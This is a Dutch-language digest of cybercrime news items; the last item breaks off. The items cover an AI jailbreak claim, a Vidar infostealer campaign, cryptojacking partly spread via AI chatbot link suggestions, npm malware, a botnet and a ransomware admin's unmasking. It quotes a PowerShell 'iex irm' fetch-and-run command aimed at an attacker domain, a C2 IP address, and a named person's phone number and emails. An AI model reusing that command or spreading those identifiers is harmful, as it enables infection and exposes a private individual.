Het recent gelanceerde geavanceerde AI model Fable 5 van Anthropic is succesvol 'jailbroken'. De doorbraak werd gerealiseerd door een individu dat gebruikmaakte van een reeds 'jailbroken' versie van Claude Opus, een ander AI model. Dit incident benadrukt de voortdurende uitdagingen op het gebied van de beveiliging van kunstmatige intelligentie en de kwetsbaarheid van zelfs de meest geavanceerde systemen.

'Jailbreaking' in de context van AI modellen verwijst naar het proces waarbij de ingebouwde veiligheids- en ethische protocollen van een model worden omzeild. Dit stelt gebruikers in staat om het AI model instructies te geven die normaal gesproken zouden worden geblokkeerd, bijvoorbeeld het genereren van schadelijke inhoud, onethische adviezen of het openbaar maken van gevoelige informatie. De mogelijkheid om een nieuw 'frontier model' zoals Fable 5 te omzeilen, vooral door middel van een reeds gecompromitteerd model als Claude Opus, duidt op een potentiële keten van kwetsbaarheden binnen de AI-ecosystemen.

Dit incident onderstreept de noodzaak voor AI-ontwikkelaars om robuustere verdedigingsmechanismen te implementeren en de interacties tussen verschillende AI modellen nauwlettend te volgen. Het succesvol omzeilen van Fable 5 kan leiden tot verdere pogingen om andere geavanceerde AI systemen te manipuleren, met mogelijke gevolgen voor de betrouwbaarheid en veiligheid van AI-toepassingen in diverse sectoren.

Bron: Pliny the Liberator

Een hacker, bekend onder de naam Zab26, claimt een aanzienlijke hoeveelheid data afkomstig van Franse en andere Europese zorgsystemen te koop aan te bieden op een ondergronds forum. De geadverteerde dataset heeft een omvang van 533 GB, verdeeld over 1,16 miljoen bestanden en meer dan 115 miljoen databaserecords. De gestolen informatie zou naar verluidt 534.697 medische documenten met Protected Health Information (PHI) en 479.877 burgerservicenummers (Social Security numbers) omvatten. Daarnaast worden patiënt- en medische dossiergegevens, inloggegevens, tokens, wachtwoorddata, private keys en TLS certificaten genoemd als onderdeel van de buitgemaakte data.

De verkoper beweert niet alleen in het bezit te zijn van statische data, maar ook over live operationele toegang tot de betreffende systemen te beschikken. Dit omvat naar eigen zeggen een querypad naar het nationale DMP (Dossier Médical Partagé) platform van Frankrijk, evenals toegang tot Kubernetes clusters, mail en Slack. Indien deze beweringen waar zijn, zou dit duiden op een actieve en aanhoudende compromittering van de getroffen infrastructuren. De aanwezigheid van private keys en TLS certificaten verhoogt bovendien het risico op identiteitsdiefstal en verdere, diepere intrusie in de systemen.

De immense omvang en de gevoelige aard van de geclaimde data maken dit tot een potentieel zeer ernstig datalek voor de Europese zorgsector. Het zou honderdduizenden medische en identiteitsdocumenten betreffen, naast een groot aantal burgerservicenummers en miljoenen rijen persoonlijke gegevens gekoppeld aan Franse en Europese gezondheidssystemen.

Deze claims zijn echter nog volledig onbevestigd. De dataset en de vermeende toegang worden te koop aangeboden op een ondergronds forum, waarbij toegang tot samples achter een wachtwoord is afgeschermd en contact via XMPP of het forum verloopt. Gezien de buitengewone reikwijdte van de claim, is uiterste voorzichtigheid geboden. Grootschalige aanbiedingen die een breed scala aan "allesomvattende" data beloven, zijn soms overdreven of samengesteld uit meerdere bronnen. Er is geen onafhankelijke bevestiging van de claim en geen van de mogelijk getroffen organisaties heeft hier publiekelijk op gereageerd.

Bron: Cybercrimeinfo

Cybercriminelen hebben een nieuwe methode ontwikkeld om gebruikers van sociale media te misleiden, waarbij ze kwaadaardige bestanden verbergen in korte videoclips. Onderzoeksbureau ReversingLabs heeft ontdekt dat aanvallers TikTok en Instagram Reels exploiteren voor de verspreiding van de Vidar infostealer, een beruchte infostealer. Deze campagnes wijken af van traditionele phishing via e-mail, omdat ze de algoritmes van sociale mediaplatforms manipuleren om kwaadaardige inhoud viraal te laten gaan.

De aanpak omvat het creëren van video's in tutorial-stijl die gratis toegang beloven tot betaalde applicaties, zoals Spotify Premium of Microsoft Word. De oplichters zorgen ervoor dat de video's er professioneel uitzien, compleet met duidelijke graphics en geautomatiseerde voice-overs, om zo autoriteit uit te stralen en vertrouwen te wekken bij de kijkers.

Een van de waargenomen technieken omvat het aanmaken van accounts met gebruikersnamen zoals "windows.tips", waarbij een blauw-wit kroonlogo wordt gebruikt dat het officiële Windows-icoon nabootst. De video's instrueren kijkers om PowerShell op hun Windows-computers te openen en een specifiek commando in te typen: "iex irm". Deze misleidende instructie zorgt ervoor dat het besturingssysteem stilzwijgend verbinding maakt met een externe server om een kwaadaardige payload op te halen en uit te voeren. Gebruikers wordt bijvoorbeeld verteld de tool te richten op een domein zoals "msget.run/spotify". Omdat de video als veilig wordt gepresenteerd, voeren veel gebruikers de code uit zonder te controleren wat er daadwerkelijk wordt gedownload.

Een tweede strategie speelt in op de nieuwsgierigheid van gebruikers met behulp van informele videoclips. Scammers plaatsen video's waarin ze premium app-functionaliteiten demonstreren, vaak begeleid door populaire achtergrondmuziek, en moedigen kijkers aan om te reageren met woorden zoals "ok" om het 'geheim' te leren. Zodra een gebruiker reageert, stuurt de aanvaller een direct bericht met een link naar valse downloadsites, zoals "d4ug.site". Deze sites beweren premium games en AI tools te ontgrendelen, maar leiden slachtoffers in werkelijkheid om naar nutteloze enquêtes of kwaadaardige links.

Volgens de analyse van ReversingLabs is het succes van deze video's te danken aan het manipuleren van de platformalgoritmes. Aanbevelingssystemen geven de voorkeur aan inhoud die door gebruikers wordt opgeslagen of gedeeld. Aangezien tutorials vaak worden opgeslagen om later te bekijken, verspreidt het systeem deze clips naar een breder publiek. Onderzoekers merkten op dat één van de tijdens het onderzoek gevolgde video's 109.000 keer is bekeken, 1.699 keer is opgeslagen en 974 keer is gedeeld.

Na het volgen van de instructies wordt een bestand met de naam "build.exe" op de computer van de gebruiker gedropt, dat de Vidar Infostealer bevat. Vidar is een wijdverspreide infostealer die op ondergrondse marktplaatsen wordt verkocht als een Malware-as-a-Service (MaaS) model. Cybercriminelen kunnen een levenslange licentie aanschaffen voor 300 dollar om allerlei gegevens te stelen, waaronder wachtwoorden, bankgegevens en browsercookies. De Vidar infostealer is recentelijk bijgewerkt om stabieler te zijn en beter in staat om geautomatiseerde beveiligingsfilters te omzeilen.

Het verdedigen tegen deze campagnes is lastig, mede doordat hackers waarschuwende opmerkingen van eerdere slachtoffers kunnen verwijderen. ReversingLabs heeft de scam-accounts gemeld aan Instagram, maar het platform heeft de meldingen afgewezen. Onderzoekers dringen er nu bij gebruikers op aan om geen onbetrouwbare commando's in terminalprogramma's in te voeren. Bedrijven moeten hun personeel trainen om oplichtingspraktijken op sociale media te herkennen. Voorbereiding is in dit geval de ultieme verdediging.

Bron: ReversingLabs

Hackers zetten alledaagse zoekopdrachten naar software om in een val, waarbij ze een geavanceerde cryptojackingcampagne uitvoeren die gebruikers lokt met malware-besmette bestanden. Deze bestanden minen in het geheim cryptocurrency met behulp van de GPU van het slachtoffer. De aanvallers hebben een netwerk van meer dan 150 nep-downloadsites opgezet die populaire hulpprogramma's, zoals CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack en PDFgear, imiteren.

Analisten van Microsoft, waaronder de Microsoft Defender Experts en het Microsoft Defender Security Research Team, identificeerden deze campagne en publiceerden hun bevindingen eind mei 2026. Zij deelden een rapport waarin staat dat de campagne specifiek gericht is op gebruikers met krachtige grafische kaarten, zoals gamers, hardware-enthousiastelingen en AI-ontwikkelaars. De strategie is berekend. Minder machines infecteren, maar wel de maximale mining-waarde uit elke machine halen.

Een zorgwekkende ontwikkeling is dat de campagne slachtoffers bereikt via reacties van AI chatbots. In april 2026 observeerden onderzoekers dat gebruikers links naar door aanvallers gecontroleerde domeinen ontvingen via AI chatbot aanbevelingen, wanneer zij om softwaredownloadsuggesties vroegen. Dit markeert een verontrustende verschuiving voorbij traditionele zoekmachinemanipulatie naar een omgeving die veel gebruikers als betrouwbaarder beschouwen.

Naast het financiële motief van cryptocurrency-mining installeren de aanvallers ook ScreenConnect op gecompromitteerde machines om persistente externe toegang te behouden. Dit opent de deur naar veel schadelijker vervolgactiviteiten, waaronder diefstal van data, laterale beweging binnen bedrijfsnetwerken en zelfs de inzet van ransomware. De campagne is nog steeds actief en het bereik ervan blijft groeien.

De infectie begint zodra een gebruiker een legitiem ogende utility-installer downloadt en uitvoert. Het ZIP-archief bevat de echte applicatie naast een kwaadaardig bestand genaamd `autorun.dll`, dat automatisch wordt geladen wanneer het legitieme programma start via een techniek die bekendstaat als DLL-sideloading. Deze methode vereist geen software-exploit en laat vaak geen zichtbaar spoor achter op het scherm.

Zodra `autorun.dll` draait, dropt het een tweede kwaadaardig bestand genaamd `vcredist_x64.dll` met behulp van Windows Installer, dat fungeert als een verpakte ScreenConnect-installer. Nadat ScreenConnect is geïnstalleerd, maakt de geïnfecteerde machine verbinding met een door de aanvaller gecontroleerde server op 193.42.11[.]108. Via dit externe toegangskanaal pushen de aanvallers een uitvoerbaar bestand genaamd `SimpleRunPE.exe` naar het systeem van het slachtoffer.

`SimpleRunPE.exe` voert vervolgens de zware taken uit. Het zorgt voor persistentie met behulp van Registry Run keys en geplande taken, past uitsluitingen voor beveiligingstools aan om verborgen te blijven, en gebruikt process hollowing om mining-code te injecteren in een door Microsoft ondertekend binair bestand. Afhankelijk van de configuratie kunnen drie GPU-miners worden ingezet, namelijk gminer, lolMiner en SRBMiner-MULTI. De malware houdt ook analyse-tools zoals Windows Taakbeheer, Process Hacker en Process Explorer in de gaten. Zodra het een van deze tools detecteert, pauzeert het onmiddellijk de mining om argwaan te vermijden. Zodra die tools sluiten, wordt het minen op de achtergrond geruisloos hervat.

Het gebruik van ScreenConnect door de campagne maakt van elke gecompromitteerde machine een langdurig toegangspunt. Zelfs als de miningsoftware wordt gedetecteerd en verwijderd, kan de ScreenConnect-backdoor actief blijven, waardoor aanvallers een weg terug hebben. Beveiligingsteams moeten actief zoeken naar ongeautoriseerde ScreenConnect-sessies en installaties die niet door de IT-afdeling zijn goedgekeurd.

Microsoft adviseert om te monitoren op ongebruikelijke pieken in GPU-gebruik op desktops en servers als een vroeg teken van ongeautoriseerde mining. Het correleren van verwijzingsdata van het web en telemetrie van endpoints kan teams helpen sneller verbanden te leggen bij het onderzoeken van alerts. Gebruikers moeten software uitsluitend downloaden van officiële websites van de leverancier en elke link die wordt gesuggereerd door een AI tool met dezelfde scepsis behandelen als elk ander zoekresultaat.

Verdedigers moeten ook alerts instellen voor bestanden zoals `SimpleRunPE.exe` en letten op DLL's genaamd `autorun.dll` of `vcredist_x64.dll` die in onverwachte mappen verschijnen. Het blokkeren van bekende kwaadaardige domeinen en het monitoren van DNS-verkeer op subdomeinen van `gleeze[.]com` kan helpen de leveringsinfrastructuur van de campagne af te sluiten voordat een download plaatsvindt.

Bron: Microsoft

Op 11 juni 2026 is bekend geworden dat hackers geavanceerde in-memory malware verspreiden op systemen van Windows, door middel van phishing-e-mails die officiële belastingautoriteiten imiteren. De campagne, genaamd Operation TaxShadow, is sinds minstens 20 mei 2026 actief en richt zich op individuen in onder andere India en Japan. De e-mails zaaien paniek met waarschuwingen voor financiële boetes en deadlines.

De aanval begint met een overtuigend opgestelde e-mail. Slachtoffers die op de link klikken, komen terecht op een nagemaakte overheidswebsite, waar ze een ZIP-bestand downloaden dat wordt gepresenteerd als een officieel belastingdocument, maar in werkelijkheid een volledig voorbereid malwarepakket is.

Onderzoekers van Cyfirma hebben de campagne geïdentificeerd en vastgesteld dat dezelfde infrastructuur die werd gebruikt voor phishingpagina's die Indiase belastingautoriteiten imiteren, ook nagemaakte Japanse overheidsbelastingportals hostte. Cyfirma benadrukt dat de combinatie van geheugenresidente malware, geavanceerde ontwijking en hergebruikte infrastructuur duidt op een volwassen en goed uitgeruste dreigingsoperatie.

Deze campagne is bijzonder gevaarlijk door de social engineering en de geavanceerde malware. De payload draait bijna volledig in het geheugen en schrijft niets naar de schijf, waardoor standaard antivirusprogramma's worden omzeild. De malware onderhoudt een persistente verbinding met command-and-control-servers via verkeer dat zich vermengt met normale webactiviteit. De phishing-e-mails slaagden voor authenticatiecontroles zoals SPF, DKIM en DMARC, omdat ze via een legitieme externe e-mailbezorgdienst werden verzonden, waardoor ze spamfilters konden omzeilen.

Het kwaadaardige ZIP-archief bevat drie bestanden, een launcher, een loader-bibliotheek genaamd SbieDll.dll, en een versleutelde payload genaamd SbieDll.bin. De launcher bereidt de omgeving voor. De loader, SbieDll.dll, maakt misbruik van DLL Search Order Hijacking door een malafide DLL in de applicatiemap te plaatsen, waardoor Windows deze laadt. De loader manipuleert vervolgens toegangstokens en verwijdert permissiebarrières. Het laatste onderdeel, SbieDll.bin, bevat de kernpayload, versleuteld met aangepaste RC4. Na ontsleuteling tijdens runtime wordt deze direct in het geheugen geladen via Reflective PE Loading, zonder dat een bestand de schijf raakt, wat detectie bemoeilijkt.

De malware maakt verbinding met zijn command-and-control-server via WebSocket-verbindingen, die starten als standaard HTTP-verzoeken en upgraden naar een persistent kanaal, waardoor verkeer normaal lijkt. Het ondersteunt ook HTTP CONNECT voor routering via bedrijfsproxies. Om analyse te weerstaan, gebruikt de malware een op Mersenne Twister gebaseerde engine om het uitvoergedrag te wijzigen, Control Flow Flattening om de codestructuur te versleutelen en lost Windows API-aanroepen op tijdens runtime via hashing, wat statische analyse bemoeilijkt.

Cyfirma vond Chinese taalstrings in de broncode van de phishingpagina, hoewel dit de herkomst van de aanvallers niet bevestigt. Cyfirma beveelt voortdurende training in beveiligingsbewustzijn aan over phishing en overheidsimitatie. Technische teams moeten YARA- en Sigma-regels implementeren voor DLL-hijacking, reflective loading en WebSocket C2-patronen, en continue geheugenmonitoring inschakelen om dreigingen te detecteren die traditionele verdedigingsmechanismen omzeilen. Indicators of Compromise (IoC's) zijn beschikbaar.

Bron: Cyfirma

Op 9 juni 2026 is een kwaadaardig pakket met de naam dbmux ontdekt op npm, een van de meest gebruikte pakketregisters ter wereld. Het pakket is specifiek gericht op softwareontwikkelaars en bleek verborgen malware te bevatten die aanvallers volledige controle kan geven over elk ontwikkelaarssysteem waarop het was geïnstalleerd of uitgevoerd. Beveiligingsonderzoekers hebben de dreiging als kritiek beoordeeld.

Dbmux leek een legitiem hulpprogramma, maar bevatte code die ontworpen was om volledige toegang tot getroffen machines over te dragen aan een externe partij. Ontwikkelaars die dit pakket installeerden als onderdeel van hun dagelijkse workflow, openden onbewust de deur naar een potentieel ernstige compromittering. Deze aanval volgt een bekend patroon bij incidenten in de toeleveringsketen van software, waarbij kwaadwillende actoren schadelijke code inbedden in pakketten die ontwikkelaars vertrouwen en routinematig in hun projecten gebruiken.

Volgens een rapport van SupplyChainAttack.org moet elke computer waarop dbmux is geïnstalleerd of uitgevoerd, als volledig gecompromitteerd worden beschouwd. De waarschuwing, die ook wordt gevolgd onder GitHub Advisory GHSA-62wx-5f55-w8g2, benadrukt dat volledige controle over de getroffen systemen mogelijk is overgedragen aan een externe partij. Dit plaatst het incident onder de meest ernstige typen aanvallen op de toeleveringsketen.

De reikwijdte van de potentiële impact is bijzonder zorgwekkend. Elke ontwikkelaar die dit pakket, zelfs tijdelijk, in zijn omgeving heeft gehaald, loopt het risico dat zijn referenties, tokens, API sleutels en andere gevoelige gegevens aan aanvallers worden blootgesteld. De aanval vereist geen specifieke gebruikersinteractie naast de installatie zelf, wat het bijzonder gevaarlijk maakt in geautomatiseerde build-pipelines en CI/CD-omgevingen.

De timing van deze ontdekking is ook zorgwekkend, aangezien rond dezelfde periode, op 10 juni 2026, verschillende gerelateerde kwaadaardige npm pakketten werden ontdekt. Deze omvatten onder andere @meme-sdk/trade, graphbase-js, @validator-sdk/pubkey en @validate-ethereum-address/core. Elk van deze pakketten kreeg een vergelijkbare kritieke beoordeling en maakte gebruik van dezelfde aanvalsvector via een gecompromitteerd pakket, wat duidt op een gecoördineerde golf van supply chain aanvallen gericht op het npm-ecosysteem.

De aanvalsvector in dit geval was een gecompromitteerd pakket, wat betekent dat kwaadaardige code direct in het dbmux npm pakket zelf was ingebed. Zodra een ontwikkelaar `npm install` uitvoerde en het pakket op zijn systeem landde, was de malware al gepositioneerd om te worden uitgevoerd. Deze aanpak omzeilt veel traditionele beveiligingscontroles, omdat de dreiging vermomd arriveert als een afhankelijkheid in plaats van een voor de hand liggende inbraakpoging. De GitHub Advisory vermeldt dat de malware mogelijk aanvullende kwaadaardige software op de getroffen systemen heeft geïnstalleerd, verder dan het oorspronkelijke pakket. Dit betekent dat het simpelweg verwijderen van dbmux geen garantie biedt voor een schoon systeem, aangezien aanvallers mogelijk persistente tools of backdoors hebben achtergelaten.

Beveiligingsonderzoekers dringen er bij elke ontwikkelaar die dbmux heeft geïnstalleerd of uitgevoerd, op aan om het systeem zonder uitzondering als volledig gecompromitteerd te beschouwen. De eerste en meest urgente stap is het onmiddellijk roteren van alle geheimen, API sleutels en referenties. Dit moet gebeuren vanaf een afzonderlijke, ongecompromitteerde machine om te voorkomen dat nieuwe referenties aan dezelfde aanvaller worden blootgesteld. Ontwikkelaars moeten ook hun systeemlogboeken controleren op verdachte of ongeautoriseerde activiteiten gedurende de periode dat het kwaadaardige pakket op hun machine aanwezig was. Een forensische analyse of een volledige herinstallatie van het systeem wordt sterk geadviseerd, vooral voor systemen die gevoelige gegevens verwerkten of toegang hadden tot interne infrastructuur. Een grondige controle op eventuele aanvullende malware die naast dbmux is geïnstalleerd, moet worden uitgevoerd voordat een getroffen machine weer normaal wordt gebruikt.

Dit incident dient als een scherpe herinnering dat open source pakketecosystemen, hoewel van onschatbare waarde voor moderne ontwikkeling, met verwoestende snelheid en minimale detectie kunnen worden bewapend. Ontwikkelaars en beveiligingsteams moeten strikte controle- en beoordelingspraktijken toepassen voordat ze nieuwe afhankelijkheden toevoegen aan hun projecten of geautomatiseerde pijplijnen.

Bron: SupplyChainAttack.org

Het JDY botnet, een kwaadaardig netwerk dat eerder in verband werd gebracht met Chinese dreigingsactoren zoals Volt Typhoon, heeft zijn doelwitbereik en verkenningsinspanningen aanzienlijk uitgebreid. Volgens onderzoekers van Black Lotus Labs, een onderdeel van Lumen, die de activiteiten nauwlettend volgen, richt JDY zich sterk op de Verenigde Staten, waar veel van de gecompromitteerde apparaten zich bevinden en waar het botnet zich intensief richt op militaire en aanverwante netwerken.

Het securitybedrijf merkt op dat JDY is gegroeid van ongeveer 650 actieve bots in januari 2024 tot meer dan 1.500 gecompromitteerde SOHO en IoT apparaten op dit moment. Hoewel deze aantallen mogelijk laag lijken, is het belangrijk te begrijpen dat JDY geen exploitatiekader of een DDoS-botnet is dat grote zwermen vereist voor aanvalskracht. In plaats daarvan fungeert het als een gedistribueerd scannings- en fingerprinting-netwerk dat de operators helpt doelwitten te lokaliseren die kwetsbaar zijn voor recentelijk openbaar gemaakte kwetsbaarheden.

"Analyse van deze activiteit toont een duidelijke focus op het identificeren van kwetsbare infrastructuur kort na openbare bekendmakingen van kwetsbaarheden, wat suggereert dat de verkenningsresultaten snel worden geoperationaliseerd door geavanceerde persistente dreigingsactoren (APT) die gelieerd zijn aan China," aldus het rapport van Black Lotus Labs. "Deze gerichte focus is waargenomen in diverse sectoren, waarbij het Amerikaanse leger en aanverwante entiteiten het meest prominent zijn."

CISA heeft eerder gewaarschuwd voor het risico dat Volt Typhoon-operatives vormen voor onbeveiligde SOHO-routers, en drong er bij leveranciers van netwerkapparatuur op aan om kwetsbaarheden in de webbeheerinterfaces (WMI's) van SOHO-routers te elimineren tijdens de ontwerp- en ontwikkelingsfasen.

Het JDY botnet is specifiek ontworpen voor het uitvoeren van service discovery, het verzamelen van servicebanners, het verzamelen van TLS certificaten, protocol fingerprinting en kwetsbaarheidsgerichte verkenning. Onder de gecompromitteerde apparaten bevinden zich die van Cisco, Araknis, Mimosa Networks, Ubiquiti, DrayTek, Hikvision en Linksys, voor MIPS-, MIPS64-, MIPSEL- en MIPSEL64-architecturen.

De dreigingsactoren zijn snel met het richten op nieuw openbaar gemaakte kwetsbaarheden. Onderzoekers van Lumen hebben JDY-scans waargenomen die gericht waren op CVE-2026-35616 kort nadat Fortinet de kwetsbaarheid in FortiClient EMS openbaar had gemaakt. De operators besturen het botnet via verborgen Tor-diensten, die tevens dienen als command-and-control (C2) infrastructuur. Het open-source reverse-shell en host-management framework Platypus wordt in sommige gevallen ook gebruikt.

De botnetclient registreert zich bij een centrale "Dispatch Service" en ontvangt scantaken, die het uitvoert, de resultaten comprimeert en terugstuurt naar de C2. De scanningsmodule ondersteunt TCP-scanning, SSL/TLS-scanning, UDP-scanning, ICMP-probing, bannercollectie, TLS-certificaatverzameling en service-fingerprinting met behulp van downloadbare regels. De botnetclient herhaalt dezelfde cyclus totdat de operator specifiek opdracht geeft om te stoppen.

De TCP-scanningsfunctie is technisch gezien een van de meest interessante, aldus de onderzoekers, die uitleggen dat JDY, wanneer het over voldoende privileges beschikt, veel sneller en heimelijker ruwe SYN-scans uitvoert. "Als de malware een ruwe socket kan openen, wat over het algemeen root- of administratieve privileges vereist, initieert het snelle SYN-scans met behulp van speciaal vervaardigde TCP-pakketten," legt het rapport uit. "Deze aangepaste pakketten gebruiken een vaste bronpoort van 19000, verhogen de doelpoorten één voor één en verwerken duizenden scanddoelen in batches."

Naarmate de activiteit van het JDY botnet toeneemt, moeten organisaties ervoor zorgen dat routers, firewalls en IoT apparaten de nieuwste beveiligingsupdates en patches draaien om te voorkomen dat ze worden opgenomen in verkenningsnetwerken. Verdedigers moeten ook hun externe aanvalsoppervlak verkleinen door onnodige via internet toegankelijke administratieve interfaces uit te schakelen, beheer op afstand te beperken, standaardwachtwoorden te vervangen en te monitoren op ongebruikelijke uitgaande scanactiviteit afkomstig van randapparatuur.

Bron: Black Lotus Labs | Bron 2: lumen.com | Bron 3: hubs.li

De ransomwaregroep The Gentlemen heeft zich ontpopt als de op één na meest actieve ransomwarebende gemeten naar het aantal slachtoffers. De groep trekt snel getalenteerde hackers aan door een agressieve wervingsstrategie, waarbij affiliates maar liefst 90 procent van het losgeld beloofd wordt. Recent onderzoek werpt licht op de werkelijke identiteit van de beheerder van deze ransomwaregroep.

Beveiligingsfirma Check Point Software heeft de activiteiten van The Gentlemen nauwgezet gevolgd. The Gentlemen opereert als een "ransomware-as-a-service" (RaaS), waarbij het ruime vergoedingen betaalt aan affiliates om de malware te verspreiden. Volgens Check Point is de verdeling van de opbrengsten, 90 procent voor de affiliate en 10 procent voor de beheerder, aanzienlijk hoger dan de industriestandaard van 80/20. Dit versnelt de groei van de groep door ervaren operators van concurrerende programma's aan te trekken.

Check Point ontdekte dat The Gentlemen de op één na actiefste ransomwaregroep is dit jaar, met minstens 332 gepubliceerde slachtoffers sinds de oprichting halverwege 2025, en meer dan 240 alleen al in 2026. De groep richt zich op apparaten die direct met internet verbonden zijn, zoals VPN's en firewalls, als toegangspunt. Eenmaal binnen versleutelen zij snel hele netwerken binnen enkele uren.

Volgens Check Point gebruikt de beheerder en primaire operator van de ransomwaregroep de bijnaam Zeta88 op Russischtalige cybercrimeforums, en was deze persoon voorheen bekend onder het pseudoniem Hastalamuerte. Een datalek in de backend-infrastructuur van de groep bevestigde dat Hastalamuerte/Zeta88 de persoon is die de locker en het RaaS-paneel assembleert, betalingen beheert en in wezen de beheerder is van het hele programma dat 10 procent van alle losgeldbetalingen ontvangt.

De cyberinlichtingenfirma Intel 471 toont aan dat de gebruiker Hastalamuerte een Russisch en Engels sprekend persoon is, die zich sinds 2019 heeft geregistreerd op bijna een dozijn cybercrimeforums, waaronder Exploit, Breachforums, Ramp_V2, BHF, Raidforums en Nulled. Intel 471 onthulde dat Hastalamuerte zich in januari 2025 registreerde op Breachforums vanaf een internetadres in Izjevsk, de hoofdstad van de Russische autonome republiek Oedmoertië. Op vergelijkbare wijze meldde de gebruiker Zeta88 zich in augustus 2022 aan op het Engelstalige cybercrimeforum Breached, eveneens vanaf een ander internetadres in Izjevsk.

Intel 471 vond verder dat Hastalamuerte zich in 2020 op Raidforums registreerde met het e-mailadres hastalamuerte1488@protonmail.com. De cijfercombinatie 1488 wordt geassocieerd met witte suprematie. Een zoekopdracht met dit adres via de open-source inlichtingendienst Epieos toont een koppeling met een Apple account en een telefoonnummer eindigend op 04. Epieos meldt dat dit Protonmail-adres ook is gekoppeld aan een GitHub account onder de gebruikersnaam SantaMuerte. Hoewel dit account privé is, toont de activiteitengeschiedenis van de gebruiker aan dat deze meerdere malwaretools en exploits observeert en ontwikkelt.

In april 2020 gaf Hastalamuerte op het crimeforum Nulled aan bereikbaar te zijn via de Telegram-gebruikersnaam @hastalamuerte18. Bedreigingsinformatiebedrijf Flashpoint constateerde dat deze gebruikersnaam is toegewezen aan het unieke Telegram-ID 30907522. De dienst Constella Intelligence rapporteert dat het Telegram-ID van Hastalamuerte is gekoppeld aan een andere gebruikersnaam, "bu4vs", en aan het Russische telefoonnummer 79127650004.

Door dit telefoonnummer verder te onderzoeken in Constella, kwamen meerdere gegevens naar voren uit gehackte Russische overheidsdatabases, waaruit blijkt dat het nummer is toegewezen aan Alexander Andreevich Japaev, een 36-jarige uit Izjevsk. Constella onthulde dat dit telefoonnummer werd gebruikt om een account aan te maken op het Russische socialemediaplatform Pikabu onder de naam "4apai18". Het toont ook aan dat de heer Japaev zich op verschillende websites heeft geregistreerd met de veelvoorkomende achternaam Ivanov, of "Chapaev" (waarbij het cijfer 4 vaak wordt gebruikt als afkorting voor een "ch"-klank in het Russisch).

Een zoekopdracht in Intel 471 naar cybercrimeforumleden met de bijnaam SantaMeurte bracht een account met dezelfde naam aan het licht, aangemaakt in 2020 op het Russische hackingforum Codeby. Intel 471 toont aan dat deze gebruiker zich oorspronkelijk op Codeby registreerde met de onverbloemde bijnaam Alexandr 4apaev. Constella vond dat de heer Japaev regelmatig het e-mailadres bu4vs@mail.ru gebruikte. Ondertussen toont Epieos aan dat dit adres is gekoppeld aan een LinkedIn-account van Alexander Japaev, die zichzelf vermeldt als hoofd B2B-marketing bij het bedrijf Uralenergo Udmurtia, een van Ruslands grootste leveranciers van elektrotechnische en verlichtingsproducten. De heer Japaev heeft niet gereageerd op meerdere verzoeken om commentaar.

Bron: Krebs on Security | Bron 2: research.checkpoint.com | Bron 3: kelacyber.com

Onderzoekers hebben met het AI model Claude Opus 4.8 een belangrijke fout ontdekt in Zcash, een cryptomunt die bekend staat om zijn focus op privacy. Deze kwetsbaarheid, die al vier jaar bestond, maakte het in theorie mogelijk om ongelimiteerd nieuwe tokens te genereren, wat neerkomt op het digitaal drukken van geld. De ontdekking van de bug onderstreept de groeiende capaciteit van geavanceerde AI modellen in het vinden van kwetsbaarheden en bugs in software.

De fout bevond zich specifiek in de zogenaamde 'Orchard pool' van Zcash, een afgeschermde privacy pool waar alle verwerkte transacties volledig verborgen blijven. Dit in tegenstelling tot veel andere cryptomunten, waar transacties publiekelijk traceerbaar zijn, ook al blijven de identiteiten van de gebruikers anoniem. Door deze privacyfunctie is het bijzonder moeilijk om te achterhalen of en in welke mate er misbruik is gemaakt van de bug om 'gratis geld' te creëren. Onderzoeker Tom Robinson meldde deze bevindingen op LinkedIn.

De kwetsbaarheid werd eind mei ontdekt en op 2 juni reeds verholpen. Op dit moment zijn er geen aanwijzingen dat er op grote schaal misbruik is gemaakt en dat er massaal veel Zcash-tokens zijn gegenereerd die de markt zouden overspoelen. De private pool heeft bovendien een ingebouwde harde limiet van 4 miljoen tokens die van de Orchard pool naar de publieke pool mogen worden verplaatst. Dit beperkt de potentiële schade. Echter, als iemand duizenden of zelfs miljoenen private ZEC-tokens had gegenereerd en deze geleidelijk naar buiten had gebracht, zouden de laatste gebruikers die hun munten uit de private pool willen halen mogelijk achterblijven met een overschot aan nutteloze tokens die de limiet overschrijden.

De gevolgen voor Zcash waren aanzienlijk. Binnen 24 uur na de bekendmaking van de bug daalde de waarde van de munt met 35 tot 40 procent, als gevolg van verloren vertrouwen bij investeerders. Dit incident werpt de vraag op of Zcash de eerste van vele cryptomunten zal zijn die te maken krijgen met dergelijke AI-gedreven bugvindingen. Eerder gaf Mozilla, de organisatie achter de Firefox-browser, al aan dat een model van Anthropic honderden fouten in hun browser had gevonden. Anthropic zelf beschouwde zijn securitymodel Claude Mythos als "te gevaarlijk" om openbaar te maken. De verwachting is dat de komende maanden en jaren een stortvloed aan bugrapporten zal volgen, wat een nieuwe uitdaging vormt voor cryptomunten die voor een groot deel afhankelijk zijn van vertrouwen.

Bron: Datanews.be

Deze accounts zouden afkomstig zijn van klanten uit Nederland, Duitsland, Oostenrijk, Zwitserland en de Verenigde Staten. De aanbieder verkoopt combinaties van e-mailadres en wachtwoord, en van gebruikersnaam en wachtwoord. Op verzoek kunnen accounts voor specifieke platforms worden geleverd.

Onder de merken waarvan accounts worden aangeboden, bevinden zich onder andere Amazon, Zalando, QVC, BestSecret en HSE. De gestolen inloggegevens lijken afkomstig te zijn uit credential logs en infostealers, een type malware dat inloggegevens van besmette computers steelt.

De dreigingsactor adverteert met de beschikbaarheid van grote volumes, dagelijkse updates, vervangingsgaranties en de mogelijkheid voor selectie op maat. De authenticiteit van de accounts is echter niet onafhankelijk geverifieerd.

De handel in dergelijke gestolen accounts voedt verdere cybercriminaliteit, waaronder accountovernames, credential stuffing en phishingaanvallen. Om het risico op slachtofferschap te beperken, wordt consumenten aangeraden unieke wachtwoorden te gebruiken voor elke webshop en waar mogelijk meerfactorauthenticatie in te schakelen.

Bron: Cybercrimeinfo

Het ondergrondse forum DaMaGeLiB, een belangrijke bibliotheek en forum binnen het bredere cybercrime ecosysteem rond het bekende forum XSS, is recentelijk offline gegaan. Dit gebeurde nadat de beheerder, bekend onder de naam gliderexpert, op 3 juni 2026 rond half zes 's middags verdween. Tegelijkertijd werden de servers die het forum, de bestandsdeling en de git omgeving hostten, onbereikbaar.

